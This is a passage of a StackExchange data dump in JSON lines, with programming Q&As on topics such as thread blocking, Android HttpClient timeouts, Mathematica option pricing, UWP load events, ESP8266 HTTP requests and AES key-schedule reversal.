xmlns:context=\"http:\/\/www.springframework.org\/schema\/context\">\n\n <context:property-placeholder location=\"classpath:com\/foo\/jdbc.properties\"\/>\n ...\n\n<beans>\n \n<\/code>\n","meta":{"source":"stackoverflow","title":"Spring Inject boolean value from property file using XML is always false","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why can's a thread make a blocking system call (user level threads)?\n\nQuestion: I am reading Modern Operating System (4th edition). I am not really sure about this paragraph.\n\nDespite their better performance, user-level threads packages have some major\n problems. First among these is the problem of how blocking system calls are implemented.\n Suppose that a thread reads from the keyboard before any keys have\n been hit. Letting the thread actually make the system call is unacceptable, since\n this will stop all the threads.\n\nIf a thread blocks waiting for an input, can't another thread be off doing something else? Why it would \"stop all the threads\"?\nAnswer: User level threads are implemented in user code; they are not scheduled individually by the kernel. All user level threads run in the context of a single kernel-scheduled task and therefore one can not preempt another. So when a user thread makes a system call, it blocks, and there is no way for another user thread (in the same kernel-scheduled task) to execute. \nNote that this is not how most threads work on modern OSes. pthreads on Linux and threads created by CreateThread on NT kernels are scheduled individually by the kernel. \nAnswer: The issue that statement addresses is that user threads are implemented as a library. There is a main thread that manages other threads. The main thread uses timers to switch among the various threads. On most [all?] Unix implementations a blocking I\/O call blocks the timers from being delivered to the main thread and all threads come to a halt.\nIn kernel threads, the operating system (not the process) schedules threads for execution so this is not an issue because the kernel is not blocked.\nKeep in mind that the quoted statement is not true for user threads on all operating systems. Many non-unix systems will deliver timer notification to a process even when there is a blocking I\/O request pending.\nComment: From the Tanenbaum OS book it is mentioned the following: \"in user level threads, if a thread starts running, no other thread in that process will ever run unless the first thread voluntarily gives up the CPU\". This contradicts with your statement \"The main thread uses timers to switch among the various threads.\" Could you explain it?\nComment: That is only true with SOME operating systems (notably eunuchs). Systems with software interrupts have no problem.\n","meta":{"source":"stackoverflow","title":"Why can's a thread make a blocking system call (user level threads)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Apache HttpClient 4.0 failing to timeout for socket on Android\n\nQuestion: I'm working on an Android application that requires the use of HttpClient in order to upload a file from the Android device to a web server. The file I'm uploading can reach sizes up to 1 Gb, and so timeouts can occur if the device loses connection during the upload. The weird thing is that the timeout I set for the socket doesn't seem to have any effect. The application would just hang whenever I lose connection instead of raising the SocketTimeoutException. \nI tried using:\n<code>HttpConnectionParams.setConnectionTimeout(params, CrashLogParams.TIMEOUT);\nHttpConnectionParams.setSoTimeout(params, CrashLogParams.TIMEOUT);\n<\/code>\nbut this only worked for the connection timeout, not the socket timeout. Also I tried:\n<code>HttpParams p = httpclient.getParams();\np.setIntParameter(CoreConnectionPNames.SO_TIMEOUT, 10000);\np.setIntParameter(CoreConnectionPNames.CONNECTION_TIMEOUT, 10000);\n<\/code>\nThe reason I know that connection timeout works is because, I would get the exception for connection timeout after executing\n<code>httpclient.execute(httppost);\n<\/code>\nThe application seems to hang when connection is lost during upload, but after the application has successfully made a connection to the server.\nTo test my app, I disabled the network at different times to see how the application would react. If I disable the network before sending the request, I get a connection error and my application can gracefully handle that, but if I disable it during upload the application hangs. Of course I'm doing all these requests through AsyncTasks, so the main UI Thread doesn't crash. I'm just wondering if there is any other way to make sure that the socket will timeout upon not receiving any data, or if I'm missing anything here. I've read many blogs and posts, but most of them just suggest using SO_TIMEOUT which doesn't work for me.\nsotimeout not working in a multipart http post on android 2.1\nComment: Has your app worked with smaller size file?\nComment: I've tried 1 mb files and the bug is still there. I guess with smaller files you will have a more likelihood of disconnecting in times between the file uploads, but that is besides the point. I want to be able to make my application robust in the event of network failures.\nComment: I am having this same exact problem, except my upload sizes are fairly small, on the order of a few kb. All that seems to be required to trigger the bug is for the network to go down after I check if it is up but before I call execute().\nAnswer: Are you creating your own ClientConnectionManager? Take a look at the source for AndroidHttpClient.newInstance(). \nThey create a new BasicHttpParams object and pass it to the constructors for both a ThreadSafeClientConnectionManager and the DefaultHttpClient. I don't see a way to set parameters on the ClientConnectionManager except in the constructor.\nComment: Yes I am extending DefaultHttpClient to create my own HttpClient that enables SSL. The extended class overrides the createClientConnectionManager(), and sets the HttpParams as you stated. The code I listed was able to set the connection timeout correctly because when I increased the timeout time, the time I had to wait until an exception was raised also increased correspondingly. The only problem is the socket timeout never gets raised no matter what values I try.\nAnswer: I'm facing the same problem as you, with the same use case. It happens on a samsung galaxy s2 running android 2.3.6 but not with the same device on 4.x . Unfortunately this is exactly the device my customer uses, and it runs fine on roughly 10 other test devices with various Android versions and constructors...\nI spent hours trying with <code>HttpUrlConnection<\/code> library instead of HttpClient from Apache, but the end result is the same. <code>AndroidHttpClient<\/code> shows the same behavior. This leads me to say that it sounds like an hardware implementation or OS related problem...\nThe only workaround I found was to put the <code>HttpClient.execute()<\/code> method in a separate thread and call <code>thread.join(timeout)<\/code> as a security to stop the thread if anything goes wrong. The drawback is when upload runs fine but takes longer than the timeout, the request is interrupted...\nIf you found something in the meantime, I would greatly appreciate if you could share it.\n","meta":{"source":"stackoverflow","title":"Apache HttpClient 4.0 failing to timeout for socket on Android","dup_signals":{}},"subset":"stackexchange"} +{"text":"style tag content can be truncated in Microsoft Edge\n\nQuestion: Given the following HTML document displayed in Microsoft Edge (110.0.1587.57), and the content of a style tag exceeds 10,000 characters, Edge will act as though classes in the style tag found after the 10k character mark do not exist.\n<code><html>\n <head>\n <style>.test{background-color:orange}p{color:green}<\/style>\n <\/head>\n <body>\n <p>This text should be green!<\/p>\n <\/body>\n<\/html>\n<\/code>\nIf you change the code above and duplicate the \".test{background-color:orange}\" approximately 350 times, you will have a style tag long enough to recreate the problem. The p style should remain at the end or at least beyond the 10,000 character mark.\nWhen you open the developer tools by clicking on the paragraph tag and inspecting the html, the css section does not show the style for the p tag. And consequently, the text is black.\nOn the test html, there are some times when the text comes up green. This is not the case in the actual problem environment so I have not perfectly recreated the problem. However, the test html does demonstrate the problem if I let it set for a while. The text will turn black again and the css section will no longer show the p style being applied.\nWhen I run the same test in Firefox, the p style displays correctly.\nAnswer: I have tried testing the issue with the Microsoft Edge (110.0.1587.57) and Google Chrome.\nIn both browsers, text shown in the green color.\n\nWhen we check the CSS code under Style tag using the Dev tools, it shows ellipsis because the length of the CSS is long.\n\nBut it does not mean that CSS that not displayed here, not got executed.\nWhen you click the element on the page, you could see the CSS applied to it.\n\nBeside the CSS, there is a link to source code. If you click it, you will see the whole code.\n\nI have tried several times, I did not see the black text or the CSS is not applied to text even after pasting the <code>.test{background-color:orange}<\/code> more then 350 times.\nIf you still seeing the issue, I would suggest try to update the Edge to 111.x version and see the results.\n","meta":{"source":"stackoverflow","title":"style tag content can be truncated in Microsoft Edge","dup_signals":{}},"subset":"stackexchange"} +{"text":"About Internal mechanics in FinancialDerivative\n\nQuestion: I want to find the price of a call option,using mathematica.\nHowever, I found a question when using Financial Derivative.\nThe following two codes are to get the price of the call.\n<code>SeedRandom[1234];\nsmpl1=FinancialDerivative[{\"European\", \"Call\"}, {\"StrikePrice\" -> 50.00, \n \"Expiration\" -> 1}, {\"InterestRate\" -> 0.1, \"Volatility\" -> 0.5, \n \"CurrentPrice\" -> #}] & \/@ Range[1, 100];\nListLinePlot[smpl1]\n<\/code>\n\n<code>smpl2 = Table[\n SeedRandom[1234];\n Max[Last[#[[;; , 2]]] - 50, 0] & \/@ \n Normal[RandomFunction[\n GeometricBrownianMotionProcess[0.1, 0.5, start], {0, 1, 0.1}, \n 100000]] \/\/ Mean,\n {start, 1, 100}];\nListLinePlot[smpl2]\n<\/code>\n\nAs far as I know,FinancialDerivative must use <code>GeometricBrownianMotionProcess<\/code>,but the result is completely different.\nWhat's happening in mathematica or just a bug of my code?\nOk,I had to make the value risk-neutral.\n<code>smpl3 = Table[SeedRandom[1234];\n Exp[-0.1]*Max[Last[#[[;; , 2]]] - 50, 0] & \/@ \n Normal[RandomFunction[\n GeometricBrownianMotionProcess[0.1, 0.5, start], {0, 1, 0.1}, \n 100000]] \/\/ Mean, {start, 1, 100}];\nListLinePlot[{smpl1, smpl3}]\n<\/code>\nComment: trying fixing my code again and again, and I noticed I have to multiply `Exp[-0.1]` to make the value risk-free...self-solved....\nComment: Please check if `Max[{1, 2, 3}-2, 0]` returns what you expect.\nComment: yes,that returns what I expected\nComment: Commenting with a very limiting knowledge about financial derivatives and financial computing: I would say that ``FinancialDerivative`` doesn't do stochastic simulation, but instead simply takes the _analytical solution_ for the mean of the corresponding stochastic process. For example: ``Mean[GeometricBrownianMotionProcess[\\[Mu], \\[Sigma], x0][t]] \/\/ Simplify`` returns ``E^(t \\[Mu]) x0``.\nAnswer: As I have already mentioned in the comment, Mathematica almost surely uses the exact solutions of the Black-Sholes model.\n<code>FinancialDerivative[{\"European\", \"Call\"}, {\"StrikePrice\" -> 50.00, \n \"Expiration\" -> 1}, {\"InterestRate\" -> 0.1, \"Volatility\" -> 0.5, \n \"CurrentPrice\" -> 100}]\n(* 55.5471 *)\n\nn[x_] := CDF[NormalDistribution[], x]\ncall[k_, r_, \\[Sigma]_, t_, S0_] := Module[{d1, d2},\n d1 = 1\/(\\[Sigma] Sqrt[t]) (Log[S0\/k] + (r + \\[Sigma]^2\/2) t);\n d2 = d1 - \\[Sigma] Sqrt[t];\n n[d1] S0 - n[d2] k Exp[-r t]\n]\n\ncall[50, .1, .5, 1, 100]\n(* 55.5471 *)\n\nPlot[call[50, .1, .5, 1, S0], {S0, 0, 100}]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"About Internal mechanics in FinancialDerivative","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to parser JavaScript multidimensional array to c# array?\n\nQuestion: Example of JavaScript arrays:\n<code>var array_1 = [[\"string 1\", 2013, \"string 2\"], \"string 3\", [\"string 4\", , \"string 5\"]];\n\/* array_1[0][2] = \"string 2\" *\/\n\nvar array_2 = [1, , [\"string 1\", \"string 2\"]];\n\/* array_2[0][0] = 1 *\/\n<\/code>\nI need to parse JS arrays like it to c# <code>jagged array<\/code> or <code>any other object<\/code> that can access each child string by index easy, by function, with:\n\nnumber become string (<code>1<\/code> => <code>\"1\"<\/code>)\n<code>null<\/code> become <code>\"\"<\/code> (string with length = 0).\n\nCan you help me how to do this? Thank you very much!\nAnswer: using Json.NET\n<code>\/\/ using\nusing Newtonsoft.Json.Linq;\n\nstring JSarray_1 = @\"[[\"\"string 1\"\", 2013, \"\"string 2\"\"], \"\"string 3\"\", [\"\"string 4\"\", , \"\"string 5\"\"]]\";\nJObject j = JObject.Parse(\"{\\\"j\\\":\" + JSarray_1 + \"}\");\nMessageBox.Show((string)j[\"j\"][0][2]); \/\/ \"string 2\"\n<\/code>\nAnswer: See the C# language documentation: \"Multidimensional Arrays (C#)\"\n<code>string[,] items = new string[,] {{\"string 1\",\"string 2\"},...};\n<\/code>\nComment: Technically, what the OP seems to have there is a jagged array, not a multi-dimensional one.\nAnswer: I think what TuyenTk is looking for, and emigue is trying to describe is to use a library which does the \"magic\"(=parsing)\nI'd recommend JSON.Net since it's the one I use all the time - but I guess there are plenty of these out there.\nThe linked page also includes some simple examples on how to use it.\nAbout replacing null with emptystring:\n<code>var myValue = origValue ?? String.Empty;\n<\/code>\nif origValue is null myValue will be set to \"\", otherwise the expression will evaluate to origValue;\nFor further information on \"??\", or the \"null-coalescing operator\" as it's called, see the doc\nAnswer: As Jagged Arrays \n<code>string[][] items = new string[3][];\n\nitems [0] = new string[2];\nitems [1] = new string[1];\nitems [2] = new string[2];\n\nitems[0][0] = \"string1\";\nitems[0][1] = \"string3\";\nitems[1][0] = \"string4\";\nitems[2][0] = \"string5\";\nitems[2][1] = \"string6\";\n<\/code>\nOR\n<code>string[][] items = new string[][] \n{\n new string[] {\"string1\", \"string3\"},\n new string[] {\"string4\"},\n new string[] {\"string5\", \"string6\"}\n};\n<\/code>\nAnswer: If you need parse javascript arrays to c# arrays, You can serialize Javascript arrays to JSON and then deserialize JSON to C# array.\nPreviously, you need to do one transformation: replace \"\" by null in Javascript array representation as string.\nThen, you can make something like this:\n<code>var JSArrayString = @\"{\"array_1\": [[\"string 1\", 2013, \"string 2\"], \"string 3\", [\"string 4\", null, \"string 5\"]]}\";\nvar CSharpDict = SomeJSONLibrary.Deserialize(JSString);\nvar CSharpArray = CSharpDict[\"array_1\"];\nvar myItem = CSharpArray[0][2];\n<\/code>\nComment: Sorry, can you explain more clearly? From `JSArrayString` to `CSharpArray[0][2]` is a long distance.\n","meta":{"source":"stackoverflow","title":"How to parser JavaScript multidimensional array to c# array?","dup_signals":{}},"subset":"stackexchange"} +{"text":"UWP Event when all page components have loaded?\n\nQuestion: This seems very simple, but I have googled & googled without success. I'm trying to find the definitive list of page load event ordering. My observations so far are very confusing as the main page's Loaded event completes ahead of some of the user control Loaded events. I think in WPF there's a LoadCompleted event, but I can't find the equivalent. \nthanks!\nAnswer: Controls load from the inside out.\nPlease consider the following example:\nMy Xaml Page\n<code> <Page\n ... Loaded=\"Page_Loaded\">\n \n <Grid Loaded=\"Grid_Loaded\">\n <StackPanel Loaded=\"StackPanel_Loaded\" Orientation=\"Vertical\">\n <TextBlock Loaded=\"TextBlock_Loaded\" Text=\"My Text\"\/>\n <Button Loaded=\"Button_Loaded\" Content=\"Button\"\/>\n <\/StackPanel>\n <\/Grid>\n <\/Page>\n<\/code>\nMy behind code\n<code>namespace App1\n{\n public sealed partial class MainPage : Page\n {\n public MainPage()\n {\n this.InitializeComponent();\n this.Loaded += MainPage_Loaded;\n }\n\n private void MainPage_Loaded(object sender, RoutedEventArgs e)\n {\n this.Frame.Loaded += Frame_Loaded;\n }\n\n private void Frame_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Frame Loaded\");\n }\n\n private void Page_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Page Loaded\");\n }\n\n private void Grid_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Grid Loaded\");\n }\n\n private void StackPanel_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Stack Panel Loaded\");\n }\n\n private void TextBlock_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Text Block Loaded\");\n }\n\n private void Button_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Button Loaded\");\n }\n }\n}\n<\/code>\nWith this setup your output should be Button Loaded, Stack Panel Loaded, Grid Loaded, Page Loaded, Frame Loaded.\nand in fact, when I compile and run this I see\n\nText Block Loaded\nButton Loaded\nStack Panel Loaded\nGrid Loaded Page Loaded\nFrame Loaded\n\nin my output window.\nThis is because the controls are loading from the inside out. Now you start to run into problems when you're using asynchronous controls. You actually might have two loading events you care about. One says that the UI element is loaded and one says that the content of that UI element is loaded.\nLet's use the WebView as an example.\nIt has multiple completed events.\n\nLoadCompleted Occurs when top-level navigation completes and the\ncontent loads into the WebView control or when an error occurs during\nloading.\nFrameDOMContentLoaded Occurs when a frame in the WebView has finished\nparsing its current HTML content.\nFrameNavigationCompleted Occurs when a frame in the WebView has\nfinished loading its content.\n\nIt also has the normal Loaded event as well\n\nLoaded Occurs when a FrameworkElement has been constructed and added\nto the object tree, and is ready for interaction. (Inherited from\nFrameworkElement)\n\nSo the moral of the story is that unless you post your actual code, there's no physical way to tell what is actually going wrong. Every control can have multiple loaded events. Your delay might be caused by anything.\nComment: Actually, the statement \"the components loads from inside out\" it is not true, a counterexample would be nested UserControls.\n","meta":{"source":"stackoverflow","title":"UWP Event when all page components have loaded?","dup_signals":{}},"subset":"stackexchange"} +{"text":"configure codeship to run when non-contributors make pull requests\n\nQuestion: Default behavior for Codeship appears to be to only run CI against pull requests from existing contributors, not from people outside the organization. How do you change this behavior?\nAnswer: Unfortunately, Codeship doesn't support running tests against pull requests from people outside the organization.\nFrom the Codeship FAQ (emphasis added):\n\nTesting PRs from Forked Repositories\nCodeship does not support testing pull requests from forked\nrepositories at the moment. You'd need to configure the forked\nrepository separately on Codeship or push the branch to the already\nconfigured repository instead.\n\nhttps:\/\/codeship.com\/documentation\/faq\/testing-prs-from-forked-repositories\/\n","meta":{"source":"stackoverflow","title":"configure codeship to run when non-contributors make pull requests","dup_signals":{}},"subset":"stackexchange"} +{"text":"Finding the best-fitting subsets by frequencies of list item groupings\n\nQuestion: Suppose I have a list of groups:\n<code>{{1,2,3,4}, {1,2}, {3,4}}<\/code>\nIn this example, <code>1<\/code> most commonly appears within a group that contains <code>2<\/code>, and <code>3<\/code> most commonly appears in a group which contains <code>4<\/code>. If we form <code>N<\/code> subgroups, where N==2, the best-fitting subgroups by frequency of grouping would be <code>{{1,2}, {3,4}}<\/code>.\nAs a second example, a list of groups could be defined as:\n<code>{{1,2,3}, {1,2}, {2,3}, {3,4}}<\/code>\nIn this example:\n\n<code>1<\/code> is in a group with <code>2<\/code>: 2\/2 times\n\n<code>1<\/code> is in a group with <code>3<\/code>: 1\/2 times\n\n<code>1<\/code> is in a group with <code>4<\/code>: 0\/2 times\n\n<code>2<\/code> is in a group with <code>1<\/code>: 2\/3 times\n\n<code>2<\/code> is in a group with <code>3<\/code>: 2\/3 times\n\n<code>2<\/code> is in a group with <code>4<\/code>: 0\/3 times\n\n<code>3<\/code> is in a group with <code>1<\/code>: 1\/3 times\n\n<code>3<\/code> is in a group with <code>2<\/code>: 2\/3 times\n\n<code>3<\/code> is in a group with <code>4<\/code>: 1\/3 times\n\n<code>4<\/code> is in a group with <code>1<\/code>: 0\/1 time\n\n<code>4<\/code> is in a group with <code>2<\/code>: 0\/1 time\n\n<code>4<\/code> is in a group with <code>3<\/code>: 1\/1 time\n\nSuch that a valid subset grouping would include <code>{{1,2,3},{4}}<\/code> but not <code>{1,2,3,4}<\/code> (since <code>1<\/code> is never grouped with <code>4<\/code>). I'm not quite sure how one would score the alternative groupings to rank <code>{{1,2,3},{4}}<\/code> against another possible grouping like <code>{{1,2}, {3,4}}<\/code> to determine the best-fitting options.\nI'm open to the idea of allowing multiple subgroups to include the same item, but the number of groups returned should be manageable for large collections of unique items, such as not to explode into a full set of combinations.\nWith a large collection of lists, how might I divide the unique items across all sets into the best fitting subgroups, defined by the most common frequencies of the groupings?\nAnswer: I think you can pose this as a graph partitioning problem, and in the case where you want ideal groupings, <code>FindGraphPartition<\/code> \"finds a partition such that the sum of edge weights for edges having endpoints in different parts is minimized\" according to the documentation. Here our edge weights are the number of co-occurences:\n<code>list = {{1,2,3}, {1,2}, {2,3}, {3,4}};\nallitems = Flatten[list] \/\/ DeleteDuplicates;\n\ncountoccur[groups_, {i_, j_}] := \n Count[ContainsAll[#, {i, j}] & \/@ groups, True]\n\nedges = DeleteCases[\n If[Unequal @@ #, {UndirectedEdge @@ #, countoccur[list, #]}, \n Nothing] & \/@ Subsets[allitems, {2}], {_, 0}];\n\ng = Graph[edges[[All, 1]], EdgeWeight -> edges[[All, 2]], \n VertexLabels -> Automatic, EdgeLabels -> \"EdgeWeight\"];\n\n(* add any missing vertices culled earlier (items in isolated groups)*)\ng = VertexAdd[g, Complement[allitems, VertexList[g]]];\n\n(* use the second argument of FindGraphPartition here if you want n \n groups for each graph component *)\npartitions = If[Length[#] > 1, FindGraphPartition[Subgraph[g, #]], {#}] & \/@ \n ConnectedComponents[g];\n\nresult = Join @@ partitions\n(* result: {{3, 4}, {1, 2}} *)\n<\/code>\nComment: @iRyanBell I've updated the answer. It might help to give a few other 'official' examples in the question to test against.\nComment: It's still broken in some trivial cases like `{{1, 2}, {3}}` - I will fix that\nComment: This had to go through several revisions! But it finally works for disconnected graphs too.\nComment: This looks very close! If we have a list `{{1,2,3}, {1,2}, {3,4}}`, item `1` should never be included in a subset with item `4` as they have a grouping frequency of zero.\nComment: This is very nice! The graph partitioning function describes the problem well.\nAnswer: An alternative approach: construct a <code>WeightedAdjacencyGraph<\/code> from input list and apply <code>FindGraphPartition<\/code>:\n<code>ClearAll[waG]\nwaG = Module[{vl = Union @@ #}, \n WeightedAdjacencyGraph[vl, Normal[Total[(# + Transpose[#] &@\n SparseArray[Subsets[#, {2}] -> 1, {1, 1} Length@vl]) & \/@ #]] \/. 0 -> \u221e]] &;\n\nFindGraphPartition @ waG @ {{1, 2, 3}, {1, 2}, {2, 3}, {3, 4}}\n<\/code>\n\n<code> {{3, 4}, {1, 2}}\n<\/code>\n\n<code>FindGraphPartition @ waG @ {{1, 2}, {3}}\n<\/code>\n\n<code> {{1, 2}, {3}}\n<\/code>\n\n<code>FindGraphPartition @ waG @ {{1, 2, 3}, {1, 2}, {3, 4}}\n<\/code>\n\n<code> {{3, 4}, {1, 2}}\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Finding the best-fitting subsets by frequencies of list item groupings","dup_signals":{}},"subset":"stackexchange"} +{"text":"GET not possible in esp8266 wtih AT commands\n\nQuestion: Im trying to get temperature from website from my ESP controller. i used the same requests using IE and Fiddler they are working very fine. im doing nothing wrong also from ESP point of view.\nplease find my esp request and response below.\n\n<code>AT+CIPSTART=\"TCP\",\"http:\/\/myesp8266.comlu.com\",80\\r\\n\n<\/code>\n\n<code>CONNECT<\/code>\n<code>OK<\/code>\n\n<code>AT+CIPSEND=93\\r\\n<\/code>\n\n<code>OK<\/code>\n<code>><\/code>\n\n<code>GET http:\/\/myesp8266.comlu.com\/temp_post.php?temps=15 HTTP\/1.0\\r\\n\n\nHost: myesp8266.comlu.com\\r\\n\\r\\n`\n<\/code>\n\n<code>Recv 93 bytes<\/code>\n<code>SEND OK<\/code>\n<code>+IPD,574:HTTP\/1.1 302 Found<\/code>\n<code>Date: Tue, 09 May 2017 02:20:31 GMT<\/code>\n<code>Server: Apache<\/code>\n<code>Location: https:\/\/www.000webhost.com\/migrate?<\/code>\n<code>utm_source=000&utm_medium=rdr&utm_campaign=old_panel_off&static=true<\/code>\n<code>Content-Length: 299<\/code>\n<code>Connection: close<\/code>\n<code>Content-Type: text\/html; charset=iso-8859-1<\/code>\n<code><!DOCTYPE HTML PUBLIC \"-\/\/IETF\/\/DTD HTML 2.0\/\/EN\"><\/code>\n<code><html><head><\/code>\n<code><title>302 Found<\/title><\/code>\n<code><\/head><body><\/code>\n<code><h1>Found<\/h1><\/code>\n<code><p>The document has moved <a href=\"https:\/\/www.000webhost.com\/migrate?<\/code>\n<code>utm_source=000&utm_medium=rdr&utm_campaign=old_panel_off&static=true\">here<\/a>.<\/p><\/code>\n<code><\/body><\/html><\/code>\n<code>CLOSED<\/code>\nwhen i use IE i receive the following for the request\n\n<code>http:\/\/myesp8266.comlu.com\/temp_post.php?temps=15<\/code>\n\n<code>response -><\/code>\n<code>Notice: Undefined index: temperature in \/storage\/h9\/116\/1546116\/public_html\/temp_post.php on line 2\n15<\/code>\n<code>Temperature : Celcius<\/code>\n<code>15 is what i expect and im receiving it good...<\/code>\nBelow is the code from fiddler which im receiving good\n\n<code>send -><\/code>\n\n<code>GET http:\/\/myesp8266.comlu.com\/temp_post.php?temps=15 HTTP\/1.0<\/code>\n<code>Host: myesp8266.comlu.com<\/code>\n\n<code>response -><\/code>\n\n<code>HTTP\/1.1 200 OK<\/code>\n<code>Date: Tue, 09 May 2017 02:08:40 GMT<\/code>\n<code>Content-Type: text\/html; charset=UTF-8<\/code>\n<code>Connection: close<\/code>\n<code>Server: awex<\/code>\n<code>X-Xss-Protection: 1; mode=block<\/code>\n<code>X-Content-Type-Options: nosniff<\/code>\n<code>X-Request-ID: ce6759371cbb05088c5c954aa35de737<\/code>\n<code><br \/><\/code>\n<code><b>Notice<\/b>: Undefined index: temperature in<\/code>\n<code><b>\/storage\/h9\/116\/1546116\/public_html\/temp_post.php<\/b> on line <b>2<\/b><br \/>\n15<p>Temperature : Celcius <\/p><\/code>\nwhere is wrong?? tried in many possible ways. but no success with only ESP8266 remaining ways working good. \nplease help.\nthank you\nAnswer: Your first AT command establishes a TCP connection, but includes <code>http:\/\/<\/code> which it probably shouldn't as at this point it's not yet relevant (we're just opening a socket) \nIncorrect AT command: \n<code>AT+CIPSTART=\"TCP\",\"http:\/\/myesp8266.comlu.com\",80\\r\\n<\/code>\nCorrected AT command:\n<code>AT+CIPSTART=\"TCP\",\"myesp8266.comlu.com\",80\\r\\n<\/code>\nThe next problem is your get request\nThe host name should only be specified probably on the <code>Host<\/code> header also protocol isn't required on this line also the GET requests URL should be relative to the host I believe.\nYour request:\n<code>GET http:\/\/myesp8266.comlu.com\/temp_post.php?temps=15 HTTP\/1.0\\r\\n\nHost: myesp8266.comlu.com\\r\\n\\r\\n<\/code>\nCorrected request:\n<code>GET \/temp_post.php?temps=15 HTTP\/1.0\\r\\n\nHost: myesp8266.comlu.com\\r\\n\\r\\n<\/code>\nBesides these 2 changes guessing that's a send length after <code>AT+CIPSEND<\/code> so may need to update that too it may even be possible to omit the length entirely. \nFinally you've got a minor issue in <code>temp_post.php<\/code> which is throwing a notice you can fix this by either altering the error reporting levels or if you post some code I'll have a look :). Alternatively if you want a cheap and nasty fix prefix whatever variable is causing it with an <code>@<\/code> ie <code>@$myTemps['temperature']<\/code> (although definitely better to fix the issue)\nAnswer: simply beautiful\ni ve deleted <code>http:\/\/<\/code>\n\nCorrected AT command: and modified as you mentioned\n\n<code>AT+CIPSTART=\"TCP\",\"myesp8266.comlu.com\",80\\r\\n\n<\/code>\nworked like charm.. \nahhh.. what a breath.. tried in all possible ways except modifying CIP start. \n\n1000 thanks for resolving.\n\nGood day dear.\nComment: You're very welcome :) If my answer was correct can you please select it as the correct answer. Also I realize formatting options can be a bit limiting at times but a message like this is best suited to a comment :). If you need help with the PHP notice still either edit the question with a bit of code or comment with the first couple of lines of `temp_post.php` and I'll take a look :)\nComment: Yes. decided as right answer tick mark. and Php i ve updated myselves (it uses just a echo reply :) so simple)... and sure in future i will have some issue with php sql programming. Actually im good at programming microcontrollers. but coming to IOT and other web http realted stuffs im very poor.(TCP IP absolutely 0). Thanks for providing your kind helping hand. Let me know if you are interested too.. i will share my simple project. Note: im not 100% working on it. whenever i get free time i used to sit and work on this stuff to feel occupied in leasure time. One day i will aplly if works good\nComment: Thanks, and you're very welcome :). When it comes to PHP and SQL SO is great just ask away when you need help :) Personally I'm the opposite I came from a web background and am learning to program microcontrollers but also have good low level knowledge when it comes to TCP\/IP and HTTP. I can't commit to working on any new projects at the moment due to an injury but I try to check SO every day so if you need help just post a question or yell out :)\nComment: Great Brian... nice talking and sharings. Im sorry for your injury.. get well soon.We will keep in touch and i will share all my simple works what ive done with passwords to you if u share ur email. Just to have a look...mine is firstname.lastname@example.com..two weeks i ll be busy shifting to new office.. if i get time in between i will share alll..in 10 min u will understand my simple php codes.. Im from India by the way.\n","meta":{"source":"stackoverflow","title":"GET not possible in esp8266 wtih AT commands","dup_signals":{}},"subset":"stackexchange"} +{"text":"On-the-fly computation of AES Round Keys for decryption?\n\nQuestion: The usual implementation of AES first computes all the Round Keys sequentially starting from the key, and stores them in RAM for later uses. However, when enciphering a single block with a key that will be used for that purpose only, or when RAM is very sparse, or perhaps in hardware, it is advantageous to use the Round Keys a they are being generated, rather than store them. Quoting the Rijndael submission to NIST:\n\nThe key schedule can be implemented without explicit use of the array <code>W[Nb*(Nr+1)]<\/code>. For implementations where RAM is scarce, the Round Keys can be computed on-the-fly using a buffer of <code>Nk<\/code> words with almost no computational overhead.\n\nIt is said this also works for deciphering:\n\nThe key expansion operation that generates <code>W<\/code> is defined in such a way that we can also start with the last <code>Nk<\/code> words of Round Key information and roll back to the original Cipher Key. So, calculation 'on-the-fly' of the Round Keys, starting from an \"Inverse Cipher Key\", is still possible.\n\nHowever, the how-to is left as an exercise to the reader. In particular: Can the last Round Key (the first used when deciphering) be computed directly, rather than sequentially?\nComment: I think the idea is to run the key schedule once forward to the last round key, and store this, and then for each block run it backwards to get the individual round keys.\nComment: I think one can write a big formula for the last round key, but you will have to apply at least all the [$f_i$ functions](http:\/\/crypto.stackexchange.com\/a\/1527\/58) sequentially, so I don't think it is much faster\/simpler than running the key schedule. I didn't analyze this thoroughly, though, so I'm a bit resisting to plainly answer \"No\".\nComment: Welcome to Cryptography.SE. Your question is not totally clear. The key schedule is there, there are tons of implementations. So what do you want?\nComment: Did you read https:\/\/en.wikipedia.org\/wiki\/AES_key_schedule\nComment: @Pa\u016dloEbermann: I understand how what you describe can work, and might be useful if there is not enough RAM (or flip-flops) to store the Round Keys even temporarily. So the answer to \"_Can the last Round Key be computed directly, rather than sequentially?_\" would be: \"_No_\"?\nComment: **just to mention that it is a128b aes decryption\nComment: Hey! Thanks. I'm asking how is the inverse key expansion on aes is preformed. Lest say that I have the key for the decryption. How can I use it for the decryption process?\nComment: I read that Wikipedia article but it explains the key expansion during encryption and not during decryption. I look for the aes inverse key expansion. I know that every step ha an inverse one. What I'm asking is what is the inverse step of the key expansion\nAnswer: This self-answer is heavily based on comments by Pa\u016dlo Ebermann.\nWhen performing AES decryption with on-the-fly computation of AES Round Keys, there is no choice beyond running the key schedule forward to the last Round Key (the first used when deciphering). The structure of the key schedule creates enough non-linearity and diffusion at each of the 10 steps that no shortcut is practicable. One step comprises 4 SubBytes transformations, 16 XORs of 8-bit quantities, some rotations of all the 16 bytes of the Round Keys, and the doubling of the byte Rcon in $\\operatorname{GF}(2^8)$, in a manner such that what's produced by a byte XOR goes thru SubBytes on the next step, and non-linearly influence all the 16 bytes after 4 steps. Even halving the number of steps to reach the last Round Key would be extremely hairy, to the point of being counterproductive.\nThere are however two implementation variants:\n\nIf about 160 bytes of additional temporary RAM are available, the Round Keys can be stored as they are computed, and re-used during the decryption.\nOtherwise (and memory is often tight in a small micro-controller, or unavailable in hardware), each of the 10 steps can easily be reversed. The only remote difficulty is the un-doubling of the Rcon; it can be implemented using a small ROM table, or as <code>Rcon=((0x00-(Rcon&0x01))&0x8D)^(Rcon>>1)<\/code>. As pointed by Craig McQueen in comment, the reversal of the key schedule uses the direct AES SBox.\n\nHardware implementations 